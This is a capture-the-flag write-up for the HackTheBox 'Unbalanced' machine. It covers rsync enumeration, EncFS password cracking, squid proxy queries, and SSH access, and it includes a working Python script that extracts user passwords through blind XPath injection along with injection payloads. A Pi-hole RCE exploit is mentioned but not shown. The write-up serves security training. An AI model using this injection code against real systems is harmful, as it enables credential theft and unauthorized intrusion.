We look at how professional security testers and hackers find and exploit vulnerabilities in systems. Using the Unbalanced virtual machine, which is presented on the HackTheBox platform, we describe a detailed attack process that will help you understand the principles of how such techniques work and protect your own data.
This machine has an IP address of 10.10.10.200, which I add to /etc/hosts.
10.10.10.200 unbalanced.htb
First, open ports are scanned. This is done using a script that takes one argument — the address of the host being analyzed:
#!/bin/bash ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) nmap -p$ports -A $1
The scan detected SSH, rsync, and squid proxy services. Rsync is a program for UNIX-like systems that synchronizes files and directories in two locations with minimal bandwidth usage. It allows you to copy or list the contents of directories, and copy files with compression and recursion options.
Next, you will be shown a list of available modules.
rsync --list-only rsync://unbalanced.htb:873
Copy conf_backups.
rsync -av rsync://unbalanced.htb:873/conf_backups conf_backups
Finding the .encfs6.xml file indicates the presence of an EncFS encrypted volume. The next step is to obtain the password hash.
Let’s go over it.
This way we get the password used to encrypt the partition. All that remains is to mount the partition.
And we get the usual list of files.
These are mostly configuration files, and we are most interested in squid.conf. Let’s look at all the uncommented lines.
cat squid.conf | grep -v '^#' | uniq
The password is saved and the new domain name is added to the /etc/hosts file. The ACLs are then scanned for further analysis.
10.10.10.200 intranet.unbalanced.htb
Let’s install a proxy in the browser and contact the web server using the found domain name.
An authorization form appears on the screen. After some time spent analyzing it, it was decided to continue working with squid for further research..
Let’s take a look at the available options.
squidclient -h 10.10.10.200 -w 'Thah$Sh1' mgr:menu | grep -v 'disabled'
We can find more domain names.
squidclient -h 10.10.10.200 -w 'Thah$Sh1' mgr:fqdncache
There are three more names. Let’s add them to /etc/hosts (the last one was chosen logically).
172.31.179.2 intranet-host2.unbalanced.htb 172.31.179.3 intranet-host3.unbalanced.htb 172.31.179.1 intranet.unbalanced.htb
At first glance, we see that this site is a temporary solution.
Next, we come to this authorization form.
We test it again and get a response to the query ‘or”=’.
A list of users is obtained using XPath injection. Using special queries, the passwords for the corresponding names can be found.
First, the length of the password is determined using the string-length function. A login is used for testing: it is known that the password length is 5. The condition for lengths 4 and 5 is checked to see the difference.
The difference is noticeable. After determining the length of the password, you can get the password one character at a time. For this, login testing is also used: first the first letter is checked, comparing it with a, and then with b.
The difference is also noticeable. The next step will be to write code that automates the process of trying all passwords for each login.
import requests import string url = 'http://172.31.179.1/intranet.php' proxies = {'http':'http://10.10.10.200:3128'} users = ['bryan','sarah', 'jim', 'rita'] pass_str_len = "' or Username='USER' and string-length(Password)='" pass_str_chr = "' or Username='USER' and substring(Password,NUM,1)='" for user in users: for l in range(1,25): data = {'Username': '', 'Password': pass_str_len.replace('USER', user) + str(l) } request = requests.post(url=url, data=data, proxies=proxies) print('(' + str(l) + ') ' + user + ' : ' + ' '*10, end="\r") if 'Invalid credentials.' not in request.text: passwd = '' for num in range(l): for c in string.printable[:94]: data = {'Username': '', 'Password': pass_str_chr.replace('USER', user).replace('NUM', str(num+1)) + c } request = requests.post(url=url, data=data, proxies=proxies) print('(' + str(l) + ') ' + user + ' : ' + passwd + c +' '*10, end='\r') if 'Invalid credentials.' not in request.text: passwd += c break print(user +" : "+ passwd + " "*10) break
The first user gains access to SSH using the found password.
In the user’s home directory we find the TODO list.
We see that the tasks related to Pi-hole (password admin) have been completed. But we couldn’t view the open ports because we don’t have netstat. Then we can use this script.
Ports 8080 and 5553 are open.
Another domain and its corresponding IP address are found in the response. Next, port forwarding is configured, after which the request is made via the browser.
ssh -L 8080:127.0.0.1:8080 [email protected]
Go to the page and log in with the password admin.
Let’s look at the exploit.
We launch the listener, after which the exploit is executed to further gain access.
A password was detected in the script.
The article discusses methods for working with the HackTheBox machine: using rsync, password selection for EncFS, working with squid, XPath injection and RCE exploitation in Pi-hole. A list of users, SSH access, a new domain and a script with a password are obtained. The techniques used demonstrate the importance of updating systems and protecting data.